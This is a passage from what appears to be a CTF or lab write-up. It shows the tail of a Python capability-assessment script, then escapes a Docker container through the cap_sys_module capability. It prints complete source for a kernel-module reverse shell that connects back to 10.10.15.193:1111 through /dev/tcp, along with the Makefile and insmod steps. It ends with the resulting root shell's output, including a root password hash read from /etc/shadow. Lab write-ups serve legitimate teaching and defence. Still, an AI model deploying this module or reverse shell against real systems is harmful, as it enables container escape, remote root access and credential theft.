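                "cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,"
                "cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip\n"
                "Securebits: 00/0x0/1'b0\n")
CAPEFF_SAMPLE = '00000000a80525fb'   # constructed: Docker default set plus cap_sys_module

if __name__ == '__main__':
    result = assess(CGROUP_SAMPLE, CAPSH_SAMPLE)
    print(result)
    for cap in result['host_reaching']:
        print(f"  {cap}: {HOST_REACHING[cap]}")
```

Docker's default capability set decodes to 0xa80425fb and yields an empty host_reaching list; the extra cap_sys_module bit in this container is the single finding, and dropping it (or running with --cap-drop=ALL plus what the workload needs) is the fix.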

Then we create a file reverse-shell.c with the content:

#include <linux/kmod.h>
#include <linux/module.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

/* Command handed to the kernel's usermode helper when the module loads:
 * an interactive bash connected back to the listener on 10.10.15.193:1111.
 * Because the kernel is shared with the host, the helper runs on the host. */
static char *argv[] = {"/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.15.193/1111 0>&1", NULL};
static char *envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL};

static int __init reverse_shell_init(void)
{
	/* UMH_WAIT_EXEC: return as soon as the helper has been exec'd */
	return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void)
{
	printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

Also create a Makefile:

obj-m += reverse-shell.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

Then we build the module with make and load it with insmod reverse-shell.ko. The callback comes from the host itself, as the hostname and interfaces in the new shell show:

(remote) root@monitors:/# id 
uid=0(root) gid=0(root) groups=0(root)
(remote) root@monitors:/# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:54:94 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.238/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:5494/64 scope global dynamic mngtmpaddr 
       valid_lft 86113sec preferred_lft 14113sec
    inet6 fe80::250:56ff:feb9:5494/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:bc:36:1c:38 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:bcff:fe36:1c38/64 scope link 
       valid_lft forever preferred_lft forever
4: br-968a1c1855aa: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:c6:52:d5:1d brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-968a1c1855aa
       valid_lft forever preferred_lft forever
6: vetha3b47d7@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether ce:eb:34:55:03:df brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::cceb:34ff:fe55:3df/64 scope link 
       valid_lft forever preferred_lft forever
(remote) root@monitors:/# cat /etc/shadow | head -n 1
root:$6$vSJnzptH$pCoAuyngEc2pUm3Hos6qTNzopXdvnXACaAZEDAQU4VoBc19qxa9eASxv/EKnkTEOWWGyuPobtS/QA2kAFkrWP0:18577:0:99999:7:::
WRITTEN BY
ITasahobby
InTernet lover